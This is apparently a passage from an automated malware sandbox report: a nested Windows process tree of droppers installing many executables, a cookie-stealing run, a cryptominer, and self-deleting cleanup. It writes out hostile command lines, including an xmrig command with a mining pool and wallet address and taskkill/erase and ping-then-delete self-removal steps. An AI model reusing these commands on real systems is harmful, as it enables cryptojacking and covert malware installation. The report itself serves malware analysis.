                                                                                                                                        • C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:4704
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-N9UHA.tmp\lylal220.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-N9UHA.tmp\lylal220.tmp" /SL5="$20456,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                              10⤵
                                                                                                                                                PID:6812
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-98QE3.tmp\4_177039.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-98QE3.tmp\4_177039.exe" /S /UID=lylal220
                                                                                                                                                  11⤵
                                                                                                                                                    PID:6004
                                                                                                                                                    • C:\Program Files\VideoLAN\ZBBVLGPBHL\irecord.exe
                                                                                                                                                      "C:\Program Files\VideoLAN\ZBBVLGPBHL\irecord.exe" /VERYSILENT
                                                                                                                                                      12⤵
                                                                                                                                                        PID:8852
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NS6A2.tmp\irecord.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NS6A2.tmp\irecord.tmp" /SL5="$304EE,6139911,56832,C:\Program Files\VideoLAN\ZBBVLGPBHL\irecord.exe" /VERYSILENT
                                                                                                                                                          13⤵
                                                                                                                                                            PID:5308
                                                                                                                                                            • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                              "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                              14⤵
                                                                                                                                                                PID:3852
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3d-4189c-062-3128e-4913840296d5f\Jaelirobyhae.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3d-4189c-062-3128e-4913840296d5f\Jaelirobyhae.exe"
                                                                                                                                                            12⤵
                                                                                                                                                              PID:5480
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1e-21fcf-87e-2d6ad-279b29edc736a\Qushusixoky.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1e-21fcf-87e-2d6ad-279b29edc736a\Qushusixoky.exe"
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5820
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2pvw4gv.2wd\sskiper.exe /s & exit
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:6896
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\e2pvw4gv.2wd\sskiper.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\e2pvw4gv.2wd\sskiper.exe /s
                                                                                                                                                                      14⤵
                                                                                                                                                                        PID:4376
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\419007873.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\419007873.exe
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:1824
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wrnrqhk.udb\KiffMainE1.exe & exit
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:4600
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3wrnrqhk.udb\KiffMainE1.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3wrnrqhk.udb\KiffMainE1.exe
                                                                                                                                                                            14⤵
                                                                                                                                                                              PID:60
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                dw20.exe -x -s 1220
                                                                                                                                                                                15⤵
                                                                                                                                                                                  PID:6432
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c010cxdh.ps3\001.exe & exit
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:2120
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\c010cxdh.ps3\001.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\c010cxdh.ps3\001.exe
                                                                                                                                                                                  14⤵
                                                                                                                                                                                    PID:7164
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrpepowv.bhf\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:5720
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrpepowv.bhf\installer.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\lrpepowv.bhf\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:7064
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edz3ycr1.cov\gpooe.exe & exit
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:7588
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\edz3ycr1.cov\gpooe.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\edz3ycr1.cov\gpooe.exe
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:6888
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              15⤵
                                                                                                                                                                                                PID:7960
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:7936
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xugifydk.zd3\sskiper.exe /s & exit
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:8024
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\xugifydk.zd3\sskiper.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\xugifydk.zd3\sskiper.exe /s
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:7740
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgjuqfbu.n0m\google-game.exe & exit
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mgjuqfbu.n0m\google-game.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\mgjuqfbu.n0m\google-game.exe
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:2156
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qr0vy2cw.1db\askinstall39.exe & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:7772
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qr0vy2cw.1db\askinstall39.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qr0vy2cw.1db\askinstall39.exe
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:8372
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ylpakpz.4o1\y1.exe & exit
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:7988
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4ylpakpz.4o1\y1.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4ylpakpz.4o1\y1.exe
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:1684
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tciczfv4.wge\setup.exe & exit
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:4568
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tciczfv4.wge\setup.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\tciczfv4.wge\setup.exe
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:7860
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:4880
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:2800
                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:5104
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\NsfythkOyih28Tw2jYDRbi02.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\NsfythkOyih28Tw2jYDRbi02.exe"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:8668
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\NsfythkOyih28Tw2jYDRbi02.exe
                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\MyG2cTcTetDqMZxDT8ordZpL.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\MyG2cTcTetDqMZxDT8ordZpL.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:8636
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\xD90MQpwJ5Hj4i3q2BS0KiPa.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\xD90MQpwJ5Hj4i3q2BS0KiPa.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:8588
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7cg6zToTn98DCwcK3cHxaHkV.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7cg6zToTn98DCwcK3cHxaHkV.exe"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:4668
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44863054663.exe"
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44863054663.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44863054663.exe"
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:8004
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44863054663.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44863054663.exe"
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                          PID:7704
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\56960371542.exe" /mix
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:7636
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\56960371542.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\56960371542.exe" /mix
                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                            PID:6568
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44514620881.exe" /mix
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:5624
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44514620881.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{75bC-PZiF6-XwtV-v9siR}\44514620881.exe" /mix
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:5816
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 756
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:5268
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 768
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:3728
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 964
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:1508
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1344
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:6732
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1332
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1572
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:1808
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1336
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:8480
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1316
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:4076
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                  edspolishpp.exe
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                    PID:976
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "7cg6zToTn98DCwcK3cHxaHkV.exe" /f & erase "C:\Users\Admin\AppData\Roaming\7cg6zToTn98DCwcK3cHxaHkV.exe" & exit
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /im "7cg6zToTn98DCwcK3cHxaHkV.exe" /f
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:6672
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1LD0xAgCw4KMuIxDDKW38zN0.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1LD0xAgCw4KMuIxDDKW38zN0.exe"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:3188
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe" /S
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:7920
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswED70.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:7224
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\ITNbXtFaskcAYMzUhWH7TzpN.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\ITNbXtFaskcAYMzUhWH7TzpN.exe"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"
                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                          PID:4780
                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                            PID:9012
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:6556
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                PID:4520
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\pub02.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                  PID:7884
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                      PID:7432
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                        PID:5468
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Rh17CzIZROzvq01RCfmzKgcH.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Rh17CzIZROzvq01RCfmzKgcH.exe"
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\xmrig.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                        PID:8864
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\KUkaM6G1RLtxyNqMkVIaFumA.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\KUkaM6G1RLtxyNqMkVIaFumA.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:8756
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\87463303769.exe"
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:5032
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\87463303769.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\87463303769.exe"
                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                PID:796
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\87463303769.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\87463303769.exe"
                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                    PID:4008
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\92885620755.exe" /mix
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                  PID:7532
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\92885620755.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\92885620755.exe" /mix
                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                      PID:4676
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 604
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:4996
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 624
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:7152
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 604
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 656
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:6252
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 668
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:9052
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\33696991865.exe" /mix
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:5776
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\33696991865.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{WTIV-lFSQN-ibV2-xptd3}\33696991865.exe" /mix
                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                          PID:3236
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 756
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 768
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:8020
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1212
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:7068
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1412
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:8056
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1532
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:6784
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1588
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:7988
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                                                            edspolishpp.exe
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                              PID:6008
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "KUkaM6G1RLtxyNqMkVIaFumA.exe" /f & erase "C:\Users\Admin\AppData\Roaming\KUkaM6G1RLtxyNqMkVIaFumA.exe" & exit
                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                            PID:5164
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                              taskkill /im "KUkaM6G1RLtxyNqMkVIaFumA.exe" /f
                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\dUqS7hrA3kvsuL96vdH641ah.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\dUqS7hrA3kvsuL96vdH641ah.exe"
                                                                                                                                                                                                                                                                                          10⤵
